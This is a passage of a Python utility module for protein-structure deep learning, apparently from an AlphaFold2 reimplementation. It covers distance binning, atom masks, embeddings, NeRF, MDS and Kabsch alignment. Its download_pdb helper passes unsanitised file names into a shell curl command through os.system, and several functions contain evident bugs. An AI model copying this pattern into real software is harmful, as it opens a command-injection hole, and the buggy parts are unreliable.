import alphafold2_pytorch.constants as constants
# helpers
def exists(val):
return val is not None
# constants: same as in alphafold2.py
DISTANCE_THRESHOLDS = torch.linspace(2, 20, steps = constants.DISTOGRAM_BUCKETS)
# distance binning function
def get_bucketed_distance_matrix(coords, mask, num_buckets = constants.DISTOGRAM_BUCKETS, ignore_index = -100):
distances = torch.cdist(coords, coords, p=2)
boundaries = torch.linspace(2, 20, steps = num_buckets, device = coords.device)
discretized_distances = torch.bucketize(distances, boundaries[:-1])
discretized_distances.masked_fill_(~(mask[..., None] & mask[..., None, :]), ignore_index)
return discretized_distances
# decorators
def set_backend_kwarg(fn):
@wraps(fn)
def inner(*args, backend = 'auto', **kwargs):
if backend == 'auto':
backend = 'torch' if isinstance(args[0], torch.Tensor) else 'numpy'
kwargs.update(backend = backend)
return fn(*args, **kwargs)
return inner
def expand_dims_to(t, length = 3):
if length == 0:
return t
return t.reshape(*((1,) * length), *t.shape) # will work with both torch and numpy
def expand_arg_dims(dim_len = 3):
""" pack here for reuse.
turns input into (B x D x N)
"""
def outer(fn):
@wraps(fn)
def inner(x, y, **kwargs):
assert len(x.shape) == len(y.shape), "Shapes of A and B must match."
remaining_len = dim_len - len(x.shape)
x = expand_dims_to(x, length = remaining_len)
y = expand_dims_to(y, length = remaining_len)
return fn(x, y, **kwargs)
return inner
return outer
def invoke_torch_or_numpy(torch_fn, numpy_fn):
def outer(fn):
@wraps(fn)
def inner(*args, **kwargs):
backend = kwargs.pop('backend')
passed_args = fn(*args, **kwargs)
passed_args = list(passed_args)
if isinstance(passed_args[-1], dict):
passed_kwargs = passed_args.pop()
else:
passed_kwargs = {}
backend_fn = torch_fn if backend == 'torch' else numpy_fn
return backend_fn(*passed_args, **passed_kwargs)
return inner
return outer
# preprocess data
def get_atom_ids_dict():
""" Get's a dict mapping each atom to a token. """
ids = set(["", "N", "CA", "C", "O"])
for k,v in SC_BUILD_INFO.items():
for name in v["atom-names"]:
ids.add(name)
return {k: i for i,k in enumerate(sorted(ids))}
def make_cloud_mask(aa):
""" relevent points will be 1. paddings will be 0. """
mask = np.zeros(14)
# early stop if padding token
if aa == "_":
return mask
# get num of atoms in aa
n_atoms = 4+len( SC_BUILD_INFO[ ONE_TO_THREE_LETTER_MAP[aa] ]["atom-names"] )
mask[:n_atoms] = 1
return mask
def make_atom_id_embedds(aa, atom_ids):
""" Return the tokens for each atom in the aa. """
mask = np.zeros(14)
# early stop if padding token
if aa == "_":
return mask
# get atom id
atom_list = ["N", "CA", "C", "O"] + SC_BUILD_INFO[ ONE_TO_THREE_LETTER_MAP[aa] ]["atom-names"]
for i,atom in enumerate(atom_list):
mask[i] = ATOM_IDS[atom]
return mask
ATOM_IDS = get_atom_ids_dict()
CUSTOM_INFO = {k: {"cloud_mask": make_cloud_mask(k),
"atom_id_embedd": make_atom_id_embedds(k, atom_ids=ATOM_IDS),
} for k in "ARNDCQEGHILKMFPSTWYV_"}
# common utils
# parsing to pdb for easier visualization - other example from sidechainnet is:
# https://github.com/jonathanking/sidechainnet/tree/master/sidechainnet/structure
def download_pdb(name, route):
""" Downloads a PDB entry from the RCSB PDB.
Inputs:
* name: str. the PDB entry id. 4 characters, capitalized.
* route: str. route of the destin file. usually ".pdb" extension
Output: route of destin file
"""
os.system(f"curl https://files.rcsb.org/download/{name}.pdb > {route}")
return route
def clean_pdb(name, route=None, chain_num=None):
""" Cleans the structure to only leave the important part.
Inputs:
* name: str. route of the input .pdb file
* route: str. route of the output. will overwrite input if not provided
* chain_num: int. index of chain to select (1-indexed as pdb files)
Output: route of destin file.
"""
import mdtraj
destin = route if route is not None else name
# read input
raw_prot = mdtraj.load_pdb(name)
# iterate over prot and select the specified chains
idxs = []
for chain in raw_prot.topology.chains:
# if arg passed, only select that chain
if chain_num is not None:
if chain_num != chain.index:
continue
# select indexes of chain
chain_idxs = raw_prot.topology.select(f"chainid == {str(chain.index)}")
idxs.extend( chain_idxs.tolist() )
# sort: topology and xyz selection are ordered
idxs = sorted(idxs)
# get new trajectory from the sleected subset of indexes and save
prot = mdtraj.Trajectory(xyz=raw_prot.xyz[:, idxs],
topology=raw_prot.topology.subset(idxs))
prot.save(destin)
return destin
def custom2pdb(coords, proteinnet_id, route):
""" Takes a custom representation and turns into a .pdb file.
Inputs:
* coords: array/tensor of shape (3 x N) or (N x 3). in Angstroms.
same order as in the proteinnnet is assumed (same as raw pdb file)
* proteinnet_id: str. proteinnet id format (<class>#<pdb_id>_<chain_number>_<chain_id>)
see: https://github.com/aqlaboratory/proteinnet/
* route: str. destin route.
Output: tuple of routes: (original, generated) for the structures.
"""
import mdtraj
# convert to numpy
if isinstance(coords, torch.Tensor):
coords = coords.detach().cpu().numpy()
# ensure (1, N, 3)
if coords.shape[1] == 3:
coords = coords.T
coords = np.newaxis(coords, axis=0)
# get pdb id and chain num
pdb_name, chain_num = proteinnet_id.split("#")[-1].split("_")[:-1]
pdb_destin = "/".join(route.split("/")[:-1])+"/"+pdb_name+".pdb"
# download pdb file and select appropiate
download_pdb(pdb_name, pdb_destin)
clean_pdb(pdb_destin, chain_num=chain_num)
# load trajectory scaffold and replace coordinates - assumes same order
scaffold = mdtraj.load_pdb(pdb_destin)
scaffold.xyz = coords
scaffold.save(route)
return pdb_destin, route
def coords2pdb(seq, coords, cloud_mask, prefix="", name="af2_struct.pdb"):
""" Turns coordinates into PDB files ready to be visualized.
Inputs:
* seq: (L,) tensor of ints (sidechainnet aa-key pairs)
* coords: (3, N) coords of atoms
* cloud_mask: (L, C) boolean mask of occupied spaces in scn format
* prefix: str. directory to save files.
* name: str. name of destin file (ex: pred1.pdb)
"""
scaffold = torch.zeros( cloud_mask.shape, 3 )
scaffold[cloud_mask] = coords.cpu().float()
# build structures and save
pred = scn.StructureBuilder( seq, crd=scaffold )
pred.to_pdb(prefix+name)
# adapted from https://github.com/facebookresearch/esm
def remove_insertions(sequence: str) -> str:
""" Removes any insertions into the sequence. Needed to load aligned sequences in an MSA. """
deletekeys = dict.fromkeys(string.ascii_lowercase)
deletekeys["."] = None
deletekeys["*"] = None
translation = str.maketrans(deletekeys)
return sequence.translate(translation)
def read_msa(filename: str, nseq: int):
""" Reads the first nseq sequences from an MSA file, automatically removes insertions."""
return [(record.description, remove_insertions(str(record.seq)))
for record in itertools.islice(SeqIO.parse(filename, "fasta"), nseq)]
# sidechainnet / MSA / other data utils
def ids_to_embed_input(x):
""" Returns the amino acid string input for calculating the ESM and MSA transformer embeddings
Inputs:
* x: any deeply nested list of integers that correspond with amino acid id
"""
assert isinstance(x, list), 'input must be a list'
id2aa = VOCAB._int2char
out = []
for el in x:
if isinstance(el, list):
out.append(ids_to_embed_input(el))
elif isinstance(el, int):
out.append(id2aa[el])
else:
raise TypeError('type must be either list or character')
if all(map(lambda c: isinstance(c, str), out)):
return (None, ''.join(out))
return out
def get_msa_embedd(msa, embedd_model, batch_converter, device = None):
""" Returns the MSA_tr embeddings for a protein.
Inputs:
* seq: ( (b,) L,) tensor of ints (in sidechainnet int-char convention)
* embedd_model: MSA_tr model (see train_end2end.py for an example)
* batch_converter: MSA_tr batch converter (see train_end2end.py for an example)
Outputs: tensor of (batch, n_seqs, L, embedd_dim)
* n_seqs: number of sequences in the MSA
* embedd_dim: number of embedding dimensions. 768 for MSA_Transformer
"""
# use MSA transformer
REPR_LAYER_NUM = 12
device = embedd_model.device
max_seq_len = msa.shape[-1]
embedd_inputs = ids_to_embed_input(msa.cpu().tolist())
msa_batch_labels, msa_batch_strs, msa_batch_tokens = batch_converter(embedd_inputs)
with torch.no_grad():
results = embedd_model(msa_batch_tokens.to(device), repr_layers=[REPR_LAYER_NUM], return_contacts=False)
# index 0 is for start token. so take from 1 one
token_reps = results["representations"][REPR_LAYER_NUM][..., 1:, :]
return token_reps
def get_esm_embedd(seq, embedd_model, batch_converter, msa_data=None):
""" Returns the ESM embeddings for a protein.
Inputs:
* seq: ( (b,) L,) tensor of ints (in sidechainnet int-char convention)
* embedd_model: ESM model (see train_end2end.py for an example)
* batch_converter: ESM batch converter (see train_end2end.py for an example)
Outputs: tensor of (batch, n_seqs, L, embedd_dim)
* n_seqs: number of sequences in the MSA. 1 for ESM-1b
* embedd_dim: number of embedding dimensions. 1280 for ESM-1b
"""
# use ESM transformer
device = embedd_model.device
REPR_LAYER_NUM = 33
max_seq_len = seq.shape[-1]
embedd_inputs = ids_to_embed_input(seq.cpu().tolist())
batch_labels, batch_strs, batch_tokens = batch_converter(embedd_inputs)
with torch.no_grad():
results = embedd_model(batch_tokens.to(device), repr_layers=[REPR_LAYER_NUM], return_contacts=False)
# index 0 is for start token. so take from 1 one
token_reps = results["representations"][REPR_LAYER_NUM][..., 1:, :].unsqueeze(dim=1)
return token_reps
def get_all_protein_ids(dataloader, verbose=False):
""" Given a sidechainnet dataloader for a CASP version,
Returns all the ids belonging to proteins.
Inputs:
* dataloader: a sidechainnet dataloader for a CASP version
Outputs: a set containing the ids for all protein entries.
"""
# store ids here
ids = set([])
# iterate for all batches
for i,batch in tqdm(enumerate(dataloaders['train'])):
# for breaking from 2 loops at once
try:
for i in range(batch.int_seqs.shape[0]):
# check if all fragments are : 4_LETTER_PDB + NUM + CHAIN
max_len_10 = len(batch.pids[i]) < 10
fragments = [len(x) <= 4 for x in batch.pids[i].split("_")]
fragments_under_4 = sum(fragments) == len(fragments) # AND CONDITION
# record id
if max_len_10 and fragments_under_4:
ids.add(batch.pids[i])
else:
if verbose:
print("skip:", batch.pids[i], "under 4", fragments)
except StopIteration:
break
# returns set of ids
return ids
def scn_cloud_mask(scn_seq, boolean=True, coords=None):
""" Gets the boolean mask atom positions (not all aas have same atoms).
Inputs:
* scn_seq: (batch, length) sequence as provided by Sidechainnet package
* boolean: whether to return as array of idxs or boolean values
* coords: optional .(batch, lc, 3). sidechainnet coords.
returns the true mask (solves potential atoms that might not be provided)
Outputs: (batch, length, NUM_COORDS_PER_RES) boolean mask
"""
scn_seq = expand_dims_to(scn_seq, 2 - len(scn_seq.shape))
# early check for coords mask
if coords is not None:
batch_mask = ( rearrange(coords, '... (l c) d -> ... l c d', c=14) == 0 ).sum(dim=-1) < coords.shape[-1]
if boolean:
return batch_mask.bool()
else:
return batch_mask.nonzero()
# do loop in cpu
device = scn_seq.device
batch_mask = []
scn_seq = scn_seq.cpu().tolist()
for i, seq in enumerate(scn_seq):
# get masks for each prot (points for each aa)
batch_mask.append( torch.tensor([CUSTOM_INFO[VOCAB.int2char(aa)]['cloud_mask'] \
for aa in seq]).bool().to(device).unsqueeze(0) )
# concat in last dim
batch_mask = torch.cat(batch_mask, dim=0)
# return mask (boolean or indexes)
if boolean:
return batch_mask.bool()
else:
return batch_mask.nonzero()
def scn_backbone_mask(scn_seq, boolean=True, n_aa=3):
""" Gets the boolean mask for N and CA positions.
Inputs:
* scn_seq: sequence(s) as provided by Sidechainnet package (int tensor/s)
* n_aa: number of atoms in a backbone. (may include cbeta as 4th pos)
* bool: whether to return as array of idxs or boolean values
Outputs: (N_mask, CA_mask, C_mask)
"""
wrapper = torch.zeros(*scn_seq.shape, n_aa).to(scn_seq.device)
# N is the first atom in every AA. CA is the 2nd.
wrapper[..., 0] = 1
wrapper[..., 1] = 2
wrapper[..., 2] = 3
wrapper = rearrange(wrapper, '... l c -> ... (l c)')
# find idxs
N_mask = wrapper == 1
CA_mask = wrapper == 2
C_mask = wrapper == 3
if boolean:
return N_mask, CA_mask, C_mask
return torch.nonzero(N_mask), torch.nonzero(CA_mask), torch.nonzero(C_mask)
def scn_atom_embedd(scn_seq):
""" Returns the token for each atom in the aa.
Inputs:
* scn_seq: sequence(s) as provided by Sidechainnet package (int tensor/s)
"""
device = scn_seq.device
batch_tokens = []
# do loop in cpu
scn_seq = scn_seq.cpu()
for i,seq in enumerate(scn_seq):
batch_tokens.append( torch.tensor([CUSTOM_INFO[VOCAB.int2char(aa.item())]["atom_id_embedd"] \
for aa in seq]).long().to(device).unsqueeze(0) )
batch_tokens = torch.cat(batch_tokens, dim=0)
return batch_tokens
def nth_deg_adjacency(adj_mat, n=1, sparse=False):
""" Calculates the n-th degree adjacency matrix.
Performs mm of adj_mat and adds the newly added.
Default is dense. Mods for sparse version are done when needed.
Inputs:
* adj_mat: (N, N) adjacency tensor
* n: int. degree of the output adjacency
* sparse: bool. whether to use torch-sparse module
Outputs:
* edge_idxs: ij positions of the adjacency matrix
* edge_attrs: degree of connectivity (1 for neighs, 2 for neighs^2, ... )
"""
adj_mat = adj_mat.float()
attr_mat = torch.zeros_like(adj_mat)
new_adj_mat = adj_mat.clone()
for i in range(n):
if i == 0:
attr_mat += adj_mat
continue
if i == 1 and sparse:
idxs = adj_mat.nonzero().t()
vals = adj_mat[idxs[0], idxs[1]]
new_idxs = idxs.clone()
new_vals = vals.clone()
m, k, n = 3 * [adj_mat.shape[0]] # (m, n) * (n, k) , but adj_mats are squared: m=n=k
if sparse:
new_idxs, new_vals = torch_sparse.spspmm(new_idxs, new_vals, idxs, vals, m=m, k=k, n=n)
new_vals = new_vals.bool().float()
new_adj_mat = torch.zeros_like(attr_mat)
new_adj_mat[new_idxs[0], new_idxs[1]] = new_vals
# sparse to dense is slower
# torch.sparse.FloatTensor(idxs, vals).to_dense()
else:
new_adj_mat = (new_adj_mat @ adj_mat).bool().float()
attr_mat.masked_fill( (new_adj_mat - attr_mat.bool().float()).bool(), i+1 )
return new_adj_mat, attr_mat
def prot_covalent_bond(seqs, adj_degree=1, cloud_mask=None, mat=True):
""" Returns the idxs of covalent bonds for a protein.
Inputs
* seq: (b, n) torch long.
* adj_degree: int. adjacency degree
* cloud_mask: mask selecting the present atoms.
* mat: whether to return as indexes or matrices.
for indexes, only 1 seq is supported
Outputs: edge_idxs, edge_attrs
"""
device = seqs.device
# get starting poses for every aa
adj_mat = torch.zeros(seqs.shape[0], seqs.shape[1]*14, seqs.shape[1]*14)
# not needed to device since it's only for indices.
scaff = torch.zeros(seqs.shape[1], 14)
scaff[:, 0] = 1
idxs = torch.nonzero(scaff).reshape(-1)
for s,seq in enumerate(seqs):
for i,idx in enumerate(idxs):
if i >= seq.shape[0]:
break
# offset by pos in chain ( intra-aa bonds + with next aa )
bonds = idx + torch.tensor( constants.AA_DATA[VOCAB.int2char(seq[i].item())]['bonds'] + [[2, 14]] ).t()
# delete link with next if final AA in seq
if i == idxs.shape[0]-1:
bonds = bonds[:, :-1]
# modify adj mat
adj_mat[s, bonds[0], bonds[1]] = 1
# convert to undirected
adj_mat[s] = adj_mat[s] + adj_mat[s].t()
# do N_th degree adjacency
adj_mat, attr_mat = nth_deg_adjacency(adj_mat, n=adj_degree, sparse=False) # True
if mat:
return attr_mat.bool().to(seqs.device), attr_mat.to(device)
else:
edge_idxs = attr_mat[0].nonzero().t().long()
edge_attrs = attr_mat[0, edge_idxs[0], edge_idxs[1]]
return edge_idxs.to(seqs.device), edge_attrs.to(seqs.device)
def nerf_torch(a, b, c, l, theta, chi):
""" Custom Natural extension of Reference Frame.
Inputs:
* a: (batch, 3) or (3,). point(s) of the plane, not connected to d
* b: (batch, 3) or (3,). point(s) of the plane, not connected to d
* c: (batch, 3) or (3,). point(s) of the plane, connected to d
* theta: (batch,) or (float). angle(s) between b-c-d
* chi: (batch,) or float. dihedral angle(s) between the a-b-c and b-c-d planes
Outputs: d (batch, 3) or (3,). the next point in the sequence, linked to c
"""
# safety check
if not ( (-np.pi <= theta) * (theta <= np.pi) ).all().item():
raise ValueError(f"theta(s) must be in radians and in [-pi, pi]. theta(s) = {theta}")
# calc vecs
ba = b-a
cb = c-b
# calc rotation matrix. based on plane normals and normalized
n_plane = torch.cross(ba, cb, dim=-1)
n_plane_ = torch.cross(n_plane, cb, dim=-1)
rotate = torch.stack([cb, n_plane_, n_plane], dim=-1)
rotate /= torch.norm(rotate, dim=-2, keepdim=True)
# calc proto point, rotate
d = torch.stack([-torch.cos(theta),
torch.sin(theta) * torch.cos(chi),
torch.sin(theta) * torch.sin(chi)], dim=-1).unsqueeze(-1)
# extend base point, set length
return c + l.unsqueeze(-1) * torch.matmul(rotate, d).squeeze()
def sidechain_container(backbones, n_aa, cloud_mask=None, place_oxygen=False,
n_atoms=NUM_COORDS_PER_RES, padding=GLOBAL_PAD_CHAR):
""" Gets a backbone of the protein, returns the whole coordinates
with sidechains (same format as sidechainnet). Keeps differentiability.
Inputs:
* backbones: (batch, L*3, 3): assume batch=1 (could be extended later).
Coords for (N-term, C-alpha, C-term) of every aa.
* n_aa: int. number of points for each aa in the backbones.
* cloud_mask: (batch, l, c). optional. cloud mask from scn_cloud_mask`.
returns point outside to 0. if passed, else c_alpha
* place_oxygen: whether to claculate the oxygen of the
carbonyl group via NeRF
* n_atoms: int. n of atom positions / atom. same as in sidechainnet: 14
* padding: int. padding token. same as in sidechainnet: 0
Outputs: whole coordinates of shape (batch, L, n_atoms, 3)
"""
device = backbones.device
batch, length = backbones.shape[0], backbones.shape[1] // n_aa
# build scaffold from (N, CA, C, CB)
new_coords = torch.zeros(batch, length, NUM_COORDS_PER_RES, 3).to(device)
predicted = rearrange(backbones, 'b (l back) d -> b l back d', l=length)
# set backbone positions
new_coords[:, :, :3] = predicted[:, :, :3]
# set rest of positions to c_beta if present, else c_alpha
if n_aa == 4:
new_coords[:, :, 4:] = repeat(predicted[:, :, -1], 'b l d -> b l scn d', scn=10)
else:
new_coords[:, :, 4:] = repeat(new_coords[:, :, 1], 'b l d -> b l scn d', scn=10)
if cloud_mask is not None:
new_coords[torch.logical_not(cloud_mask)] = 0.
# hard-calculate oxygen position of carbonyl group with parallel version of NERF
if place_oxygen:
# build (=O) position of revery aa in each chain
for s in range(batch):
# dihedrals phi=f(c-1, n, ca, c) & psi=f(n, ca, c, n+1)
# phi = get_dihedral_torch(*backbone[s, i*3 - 1 : i*3 + 3]) if i>0 else None
psis = torch.tensor([ get_dihedral_torch(*backbones[s, i*3 + 0 : i*3 + 4] )if i < length-1 else np.pi*5/4 \
for i in range(length) ])
# the angle for placing oxygen is opposite to psi of current res.
# psi not available for last one so pi/4 taken for now
bond_lens = repeat(torch.tensor(BB_BUILD_INFO["BONDLENS"]["c-o"]), ' -> b', b=length).to(psis.device)
bond_angs = repeat(torch.tensor(BB_BUILD_INFO["BONDANGS"]["ca-c-o"]), ' -> b', b=length).to(psis.device)
correction = repeat(torch.tensor(-np.pi), ' -> b', b=length).to(psis.device)
new_coords[:, :, 3] = nerf_torch(new_coords[:, :, 0],
new_coords[:, :, 1],
new_coords[:, :, 2],
bond_lens, bond_angs, psis + correction)
else:
# init oxygen to carbonyl
new_coords[:, :, 3] = predicted[:, :, 2]
return new_coords
# distance utils (distogram to dist mat + masking)
def center_distogram_torch(distogram, bins=DISTANCE_THRESHOLDS, min_t=1., center="mean", wide="std"):
""" Returns the central estimate of a distogram. Median for now.
Inputs:
* distogram: (batch, N, N, B) where B is the number of buckets.
* bins: (B,) containing the cutoffs for the different buckets
* min_t: float. lower bound for distances.
Outputs:
* central: (batch, N, N)
* dispersion: (batch, N, N)
* weights: (batch, N, N)
"""
shape, device = distogram.shape, distogram.device
# threshold to weights and find mean value of each bin
n_bins = ( bins - 0.5 * (bins[2] - bins[1]) ).to(device)
n_bins[0] = 1.5
n_bins[-1] = 1.33*bins[-1] # above last threshold is ignored
max_bin_allowed = torch.tensor(n_bins.shape[0]-1).to(device).long()
# calculate measures of centrality and dispersion -
magnitudes = distogram.sum(dim=-1)
if center == "median":
cum_dist = torch.cumsum(distogram, dim=-1)
medium = 0.5 * cum_dist[..., -1:]
central = torch.searchsorted(cum_dist, medium).squeeze()
central = n_bins[ torch.min(central, max_bin_allowed) ]
elif center == "mean":
central = (distogram * n_bins).sum(dim=-1) / magnitudes
# create mask for last class - (IGNORE_INDEX)
mask = (central <= bins[-2].item()).float()
# mask diagonal to 0 dist - don't do masked filling to avoid inplace errors
diag_idxs = np.arange(shape[-2])
central = expand_dims_to(central, 3 - len(central.shape))
central[:, diag_idxs, diag_idxs] *= 0.
# provide weights
if wide == "var":
dispersion = (distogram * (n_bins - central.unsqueeze(-1))**2).sum(dim=-1) / magnitudes
elif wide == "std":
dispersion = ((distogram * (n_bins - central.unsqueeze(-1))**2).sum(dim=-1) / magnitudes).sqrt()
else:
dispersion = torch.zeros_like(central, device=device)
# rescale to 0-1. lower std / var --> weight=1. set potential nan's to 0
weights = mask / (1+dispersion)
weights[weights != weights] *= 0.
weights[:, diag_idxs, diag_idxs] *= 0.
return central, weights
# distance matrix to 3d coords: https://github.com/scikit-learn/scikit-learn/blob/42aff4e2e/sklearn/manifold/_mds.py#L279
def mds_torch(pre_dist_mat, weights=None, iters=10, tol=1e-5, eigen=False, verbose=2):
""" Gets distance matrix. Outputs 3d. See below for wrapper.
Assumes (for now) distogram is (N x N) and symmetric
Outs:
* best_3d_coords: (batch x 3 x N)
* historic_stresses: (batch x steps)
"""
device, dtype = pre_dist_mat.device, pre_dist_mat.type()
# ensure batched MDS
pre_dist_mat = expand_dims_to(pre_dist_mat, length = ( 3 - len(pre_dist_mat.shape) ))
# start
batch, N, _ = pre_dist_mat.shape
diag_idxs = np.arange(N)
his = [torch.tensor([np.inf]*batch, device=device)]
# initialize by eigendecomposition: https://www.lptmc.jussieu.fr/user/lesne/bioinformatics.pdf
# follow : https://www.biorxiv.org/content/10.1101/2020.11.27.401232v1.full.pdf
D = pre_dist_mat**2
M = 0.5 * (D[:, :1, :] + D[:, :, :1] - D)
# do loop svd bc it's faster: (2-3x in CPU and 1-2x in GPU)
# https://discuss.pytorch.org/t/batched-svd-lowrank-being-much-slower-than-loop-implementation-both-cpu-and-gpu/119336
svds = [torch.svd_lowrank(mi) for mi in M]
u = torch.stack([svd[0] for svd in svds], dim=0)
s = torch.stack([svd[1] for svd in svds], dim=0)
v = torch.stack([svd[2] for svd in svds], dim=0)
best_3d_coords = torch.bmm(u, torch.diag_embed(s).sqrt())[..., :3]
# only eigen - way faster but not weights
if weights is None and eigen==True:
return torch.transpose( best_3d_coords, -1, -2), torch.zeros_like(torch.stack(his, dim=0))
elif eigen==True:
if verbose:
print("Can't use eigen flag if weights are active. Fallback to iterative")
# continue the iterative way
if weights is None:
weights = torch.ones_like(pre_dist_mat)
# iterative updates:
for i in range(iters):
# compute distance matrix of coords and stress
best_3d_coords = best_3d_coords.contiguous()
dist_mat = torch.cdist(best_3d_coords, best_3d_coords, p=2).clone()
stress = ( weights * (dist_mat - pre_dist_mat)**2 ).sum(dim=(-1,-2)) * 0.5
# perturb - update X using the Guttman transform - sklearn-like
dist_mat[ dist_mat <= 0 ] += 1e-7
ratio = weights * (pre_dist_mat / dist_mat)
B = -ratio
B[:, diag_idxs, diag_idxs] += ratio.sum(dim=-1)
# update
coords = (1. / N * torch.matmul(B, best_3d_coords))
dis = torch.norm(coords, dim=(-1, -2))
if verbose >= 2:
print('it: %d, stress %s' % (i, stress))
# update metrics if relative improvement above tolerance
if (his[-1] - stress / dis).mean() <= tol:
if verbose:
print('breaking at iteration %d with stress %s' % (i,
stress / dis))
break
best_3d_coords = coords
his.append( stress / dis )
return torch.transpose(best_3d_coords, -1,-2), torch.stack(his, dim=0)
def mds_numpy(pre_dist_mat, weights=None, iters=10, tol=1e-5, eigen=False, verbose=2):
""" Gets distance matrix. Outputs 3d. See below for wrapper.
Assumes (for now) distrogram is (N x N) and symmetric
Out:
* best_3d_coords: (3 x N)
* historic_stress
"""
if weights is None:
weights = np.ones_like(pre_dist_mat)
# ensure batched MDS
pre_dist_mat = expand_dims_to(pre_dist_mat, length = ( 3 - len(pre_dist_mat.shape) ))
# start
batch, N, _ = pre_dist_mat.shape
his = [np.inf]
# init random coords
best_stress = np.inf * np.ones(batch)
best_3d_coords = 2*np.random.rand(batch, 3, N) - 1
# iterative updates:
for i in range(iters):
# compute distance matrix of coords and stress
dist_mat = np.linalg.norm(best_3d_coords[:, :, :, None] - best_3d_coords[:, :, None, :], axis=-3)
stress = (( weights * (dist_mat - pre_dist_mat) )**2).sum(axis=(-1, -2)) * 0.5
# perturb - update X using the Guttman transform - sklearn-like
dist_mat[dist_mat == 0] = 1e-7
ratio = weights * (pre_dist_mat / dist_mat)
B = -ratio
B[:, np.arange(N), np.arange(N)] += ratio.sum(axis=-1)
# update - double transpose. TODO: consider fix
coords = (1. / N * np.matmul(best_3d_coords, B))
dis = np.linalg.norm(coords, axis=(-1, -2))
if verbose >= 2:
print('it: %d, stress %s' % (i, stress))
# update metrics if relative improvement above tolerance
if (best_stress - stress / dis).mean() <= tol:
if verbose:
print('breaking at iteration %d with stress %s' % (i,
stress / dis))
break
best_3d_coords = coords
best_stress = stress / dis
his.append(best_stress)
return best_3d_coords, np.array(his)
def get_dihedral_torch(c1, c2, c3, c4):
""" Returns the dihedral angle in radians.
Will use atan2 formula from:
https://en.wikipedia.org/wiki/Dihedral_angle#In_polymer_physics
Can't use torch.dot bc it does not broadcast
Inputs:
* c1: (batch, 3) or (3,)
* c1: (batch, 3) or (3,)
* c1: (batch, 3) or (3,)
* c1: (batch, 3) or (3,)
"""
u1 = c2 - c1
u2 = c3 - c2
u3 = c4 - c3
return torch.atan2( ( (torch.norm(u2, dim=-1, keepdim=True) * u1) * torch.cross(u2,u3, dim=-1) ).sum(dim=-1) ,
( torch.cross(u1,u2, dim=-1) * torch.cross(u2, u3, dim=-1) ).sum(dim=-1) )
def get_dihedral_numpy(c1, c2, c3, c4):
""" Returns the dihedral angle in radians.
Will use atan2 formula from:
https://en.wikipedia.org/wiki/Dihedral_angle#In_polymer_physics
Inputs:
* c1: (batch, 3) or (3,)
* c1: (batch, 3) or (3,)
* c1: (batch, 3) or (3,)
* c1: (batch, 3) or (3,)
"""
u1 = c2 - c1
u2 = c3 - c2
u3 = c4 - c3
return np.arctan2( ( (np.linalg.norm(u2, axis=-1, keepdims=True) * u1) * np.cross(u2,u3, axis=-1)).sum(axis=-1),
( np.cross(u1,u2, axis=-1) * np.cross(u2, u3, axis=-1) ).sum(axis=-1) )
def calc_phis_torch(pred_coords, N_mask, CA_mask, C_mask=None,
prop=True, verbose=0):
""" Filters mirrors selecting the 1 with most N of negative phis.
Used as part of the MDScaling wrapper if arg is passed. See below.
Angle Phi between planes: (Cterm{-1}, N, Ca{0}) and (N{0}, Ca{+1}, Cterm{+1})
Inputs:
* pred_coords: (batch, 3, N) predicted coordinates
* N_mask: (batch, N) boolean mask for N-term positions
* CA_mask: (batch, N) boolean mask for C-alpha positions
* C_mask: (batch, N) or None. boolean mask for C-alpha positions or
automatically calculate from N_mask and CA_mask if None.
* prop: bool. whether to return as a proportion of negative phis.
* verbose: bool. verbosity level
Output: (batch, N) containing the phi angles or (batch,) containing
the proportions.
Note: use [0] since all prots in batch have same backbone
"""
# detach gradients for angle calculation - mirror selection
pred_coords_ = torch.transpose(pred_coords.detach(), -1 , -2).cpu()
# ensure dims
N_mask = expand_dims_to( N_mask, 2-len(N_mask.shape) )
CA_mask = expand_dims_to( CA_mask, 2-len(CA_mask.shape) )
if C_mask is not None:
C_mask = expand_dims_to( C_mask, 2-len(C_mask.shape) )
else:
C_mask = torch.logical_not(torch.logical_or(N_mask,CA_mask))
# select points
n_terms = pred_coords_[:, N_mask[0].squeeze()]
c_alphas = pred_coords_[:, CA_mask[0].squeeze()]
c_terms = pred_coords_[:, C_mask[0].squeeze()]
# compute phis for every pritein in the batch
phis = [get_dihedral_torch(c_terms[i, :-1],
n_terms[i, 1:],
c_alphas[i, 1:],
c_terms[i, 1:]) for i in range(pred_coords.shape[0])]
# return percentage of lower than 0
if prop:
return torch.tensor( [(x<0).float().mean().item() for x in phis] )
return phis
def calc_phis_numpy(pred_coords, N_mask, CA_mask, C_mask=None,
prop=True, verbose=0):
""" Filters mirrors selecting the 1 with most N of negative phis.
Used as part of the MDScaling wrapper if arg is passed. See below.
Angle Phi between planes: (Cterm{-1}, N, Ca{0}) and (N{0}, Ca{+1}, Cterm{+1})
Inputs:
* pred_coords: (batch, 3, N) predicted coordinates
* N_mask: (N, ) boolean mask for N-term positions
* CA_mask: (N, ) boolean mask for C-alpha positions
* C_mask: (N, ) or None. boolean mask for C-alpha positions or
automatically calculate from N_mask and CA_mask if None.
* prop: bool. whether to return as a proportion of negative phis.
* verbose: bool. verbosity level
Output: (batch, N) containing the phi angles or (batch,) containing
the proportions.
"""
# detach gradients for angle calculation - mirror selection
pred_coords_ = np.transpose(pred_coords, (0, 2, 1))
n_terms = pred_coords_[:, N_mask.squeeze()]
c_alphas = pred_coords_[:, CA_mask.squeeze()]
# select c_term auto if not passed
if C_mask is not None:
c_terms = pred_coords_[:, C_mask]
else:
c_terms = pred_coords_[:, (np.ones_like(N_mask)-N_mask-CA_mask).squeeze().astype(bool) ]
# compute phis for every pritein in the batch
phis = [get_dihedral_numpy(c_terms[i, :-1],
n_terms[i, 1:],
c_alphas[i, 1:],
c_terms[i, 1:]) for i in range(pred_coords.shape[0])]
# return percentage of lower than 0
if prop:
return np.array( [(x<0).mean() for x in phis] )
return phis
# alignment by centering + rotation to compute optimal RMSD
# adapted from : https://github.com/charnley/rmsd/
def kabsch_torch(X, Y, cpu=True):
""" Kabsch alignment of X into Y.
Assumes X,Y are both (Dims x N_points). See below for wrapper.
"""
device = X.device
# center X and Y to the origin
X_ = X - X.mean(dim=-1, keepdim=True)
Y_ = Y - Y.mean(dim=-1, keepdim=True)
# calculate convariance matrix (for each prot in the batch)
C = torch.matmul(X_, Y_.t()).detach()
if cpu:
C = C.cpu()
# Optimal rotation matrix via SVD
if int(torch.__version__.split(".")[1]) < 8:
# warning! int torch 1.<8 : W must be transposed
V, S, W = torch.svd(C)
W = W.t()
else:
V, S, W = torch.linalg.svd(C)
# determinant sign for direction correction
d = (torch.det(V) * torch.det(W)) < 0.0
if d:
